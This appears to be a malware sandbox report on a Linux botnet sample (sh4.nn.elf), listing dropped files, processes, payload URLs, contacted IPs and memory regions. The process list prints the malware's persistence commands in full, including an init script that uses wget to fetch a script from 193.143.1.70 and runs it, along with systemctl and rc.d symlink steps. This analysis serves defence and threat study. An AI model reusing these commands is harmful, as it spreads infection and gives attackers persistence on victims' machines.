Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sh4.nn.elf
|
ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sh4.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.xsDXBV (deleted)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/sh4.nn.elf
|
/tmp/sh4.nn.elf
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf
&\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sh4.nn.elf
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 45 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
39.178.95.236
|
unknown
|
China
|
||
|
165.26.141.225
|
unknown
|
United States
|
||
|
194.159.123.177
|
unknown
|
United Kingdom
|
||
|
4.209.53.229
|
unknown
|
United States
|
||
|
158.197.127.245
|
unknown
|
Slovakia (SLOVAK Republic)
|
||
|
103.215.118.161
|
unknown
|
China
|
||
|
142.141.50.214
|
unknown
|
Canada
|
||
|
50.137.112.161
|
unknown
|
United States
|
||
|
193.99.83.157
|
unknown
|
Germany
|
||
|
94.153.2.185
|
unknown
|
Ukraine
|
||
|
110.209.22.31
|
unknown
|
China
|
||
|
21.12.27.20
|
unknown
|
United States
|
||
|
199.154.77.161
|
unknown
|
United States
|
||
|
102.58.228.243
|
unknown
|
Egypt
|
||
|
46.81.18.161
|
unknown
|
Germany
|
||
|
60.112.37.117
|
unknown
|
Japan
|
||
|
134.183.138.60
|
unknown
|
United Kingdom
|
||
|
100.180.55.210
|
unknown
|
United States
|
||
|
148.26.243.91
|
unknown
|
United States
|
||
|
55.52.17.226
|
unknown
|
United States
|
||
|
6.96.243.45
|
unknown
|
United States
|
||
|
4.10.144.212
|
unknown
|
United States
|
||
|
75.32.191.203
|
unknown
|
United States
|
||
|
4.247.78.124
|
unknown
|
United States
|
||
|
129.72.81.254
|
unknown
|
United States
|
||
|
146.14.236.232
|
unknown
|
United States
|
||
|
26.127.67.88
|
unknown
|
United States
|
||
|
16.219.11.7
|
unknown
|
United States
|
||
|
55.113.149.255
|
unknown
|
United States
|
||
|
135.167.197.8
|
unknown
|
United States
|
||
|
210.229.184.96
|
unknown
|
Japan
|
||
|
132.156.71.7
|
unknown
|
Canada
|
||
|
192.44.244.15
|
unknown
|
Sweden
|
||
|
11.7.165.28
|
unknown
|
United States
|
||
|
48.172.33.146
|
unknown
|
United States
|
||
|
110.57.220.15
|
unknown
|
China
|
||
|
90.101.123.19
|
unknown
|
France
|
||
|
121.246.231.128
|
unknown
|
India
|
||
|
90.74.100.5
|
unknown
|
France
|
||
|
18.168.94.203
|
unknown
|
United States
|
||
|
68.201.52.70
|
unknown
|
United States
|
||
|
86.187.111.137
|
unknown
|
United Kingdom
|
||
|
173.175.203.157
|
unknown
|
United States
|
||
|
177.143.36.50
|
unknown
|
Brazil
|
||
|
184.131.173.72
|
unknown
|
United States
|
||
|
119.55.178.191
|
unknown
|
China
|
||
|
25.26.118.107
|
unknown
|
United Kingdom
|
||
|
206.117.162.81
|
unknown
|
United States
|
||
|
189.61.249.89
|
unknown
|
Brazil
|
||
|
78.216.242.49
|
unknown
|
France
|
||
|
6.160.127.206
|
unknown
|
United States
|
||
|
208.199.208.25
|
unknown
|
United States
|
||
|
201.22.14.32
|
unknown
|
Brazil
|
||
|
162.212.44.50
|
unknown
|
United States
|
||
|
31.86.100.254
|
unknown
|
United Kingdom
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
77.190.100.46
|
unknown
|
Germany
|
||
|
139.58.171.244
|
unknown
|
Sweden
|
||
|
133.79.206.59
|
unknown
|
Japan
|
||
|
188.131.83.186
|
unknown
|
Moldova Republic of
|
||
|
89.180.114.13
|
unknown
|
Portugal
|
||
|
133.76.84.135
|
unknown
|
Japan
|
||
|
171.147.67.60
|
unknown
|
United States
|
||
|
104.92.23.58
|
unknown
|
United States
|
||
|
151.235.231.105
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
60.62.205.242
|
unknown
|
Japan
|
||
|
163.180.172.74
|
unknown
|
Korea Republic of
|
||
|
1.93.98.150
|
unknown
|
China
|
||
|
71.7.176.12
|
unknown
|
Canada
|
||
|
128.250.160.13
|
unknown
|
Australia
|
||
|
185.241.126.102
|
unknown
|
Ukraine
|
||
|
95.242.65.130
|
unknown
|
Italy
|
||
|
214.144.85.140
|
unknown
|
United States
|
||
|
35.137.67.123
|
unknown
|
United States
|
||
|
67.166.201.37
|
unknown
|
United States
|
||
|
212.143.122.14
|
unknown
|
Israel
|
||
|
58.93.202.204
|
unknown
|
Japan
|
||
|
135.19.124.108
|
unknown
|
Canada
|
||
|
113.224.60.152
|
unknown
|
China
|
||
|
6.9.139.234
|
unknown
|
United States
|
||
|
118.161.106.146
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
219.168.2.210
|
unknown
|
Japan
|
||
|
179.63.191.159
|
unknown
|
Costa Rica
|
||
|
139.51.193.226
|
unknown
|
United States
|
||
|
220.35.208.156
|
unknown
|
Japan
|
||
|
200.120.246.28
|
unknown
|
Chile
|
||
|
102.37.200.197
|
unknown
|
South Africa
|
||
|
34.166.75.0
|
unknown
|
United States
|
||
|
67.170.16.136
|
unknown
|
United States
|
||
|
158.228.84.43
|
unknown
|
United States
|
||
|
97.45.194.219
|
unknown
|
United States
|
||
|
158.253.175.114
|
unknown
|
United States
|
||
|
185.220.66.211
|
unknown
|
Poland
|
||
|
112.19.237.254
|
unknown
|
China
|
||
|
82.249.237.173
|
unknown
|
France
|
||
|
205.4.210.194
|
unknown
|
United States
|
||
|
27.84.65.252
|
unknown
|
Japan
|
||
|
6.68.42.202
|
unknown
|
United States
|
||
|
21.4.17.83
|
unknown
|
United States
|
||
|
220.118.107.226
|
unknown
|
Korea Republic of
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f771c419000
|
page execute read
|
|
||
|
7f771c419000
|
page execute read
|
|
||
|
7f77a44f3000
|
page read and write
|
|||
|
7f771c42d000
|
page read and write
|
|||
|
7f77a5038000
|
page read and write
|
|||
|
7f77a4ec2000
|
page read and write
|
|||
|
562e15a2d000
|
page execute read
|
|||
|
562e17c49000
|
page execute and read and write
|
|||
|
7f77a4b77000
|
page read and write
|
|||
|
562e18f16000
|
page read and write
|
|||
|
7f771c429000
|
page read and write
|
|||
|
7f77a5038000
|
page read and write
|
|||
|
7f77a4501000
|
page read and write
|
|||
|
562e17c49000
|
page execute and read and write
|
|||
|
562e17c60000
|
page read and write
|
|||
|
7ffc84400000
|
page read and write
|
|||
|
562e17c60000
|
page read and write
|
|||
|
562e15a2d000
|
page execute read
|
|||
|
562e18f16000
|
page read and write
|
|||
|
7f771c432000
|
page read and write
|
|||
|
7f779c000000
|
page read and write
|
|||
|
7f77a4790000
|
page read and write
|
|||
|
7f77a4ff3000
|
page read and write
|
|||
|
7f77a4ec2000
|
page read and write
|
|||
|
7f77a3cf0000
|
page read and write
|
|||
|
7f77a4501000
|
page read and write
|
|||
|
7f77a4feb000
|
page read and write
|
|||
|
562e15c4b000
|
page read and write
|
|||
|
7f77a44f3000
|
page read and write
|
|||
|
7f77a4790000
|
page read and write
|
|||
|
7f77a4ff3000
|
page read and write
|
|||
|
7f771c429000
|
page read and write
|
|||
|
562e15c43000
|
page read and write
|
|||
|
7ffc84587000
|
page execute read
|
|||
|
7f77a4b77000
|
page read and write
|
|||
|
7f779c000000
|
page read and write
|
|||
|
7ffc84400000
|
page read and write
|
|||
|
7f77a3cf0000
|
page read and write
|
|||
|
7f77a4feb000
|
page read and write
|
|||
|
7f771c42d000
|
page read and write
|
|||
|
7f77a4b52000
|
page read and write
|
|||
|
7ffc84587000
|
page execute read
|
|||
|
562e15c43000
|
page read and write
|
|||
|
7f779c021000
|
page read and write
|
|||
|
7f779c021000
|
page read and write
|
|||
|
562e15c4b000
|
page read and write
|
|||
|
7f77a4b52000
|
page read and write
|
There are 37 hidden memdumps, click here to show them.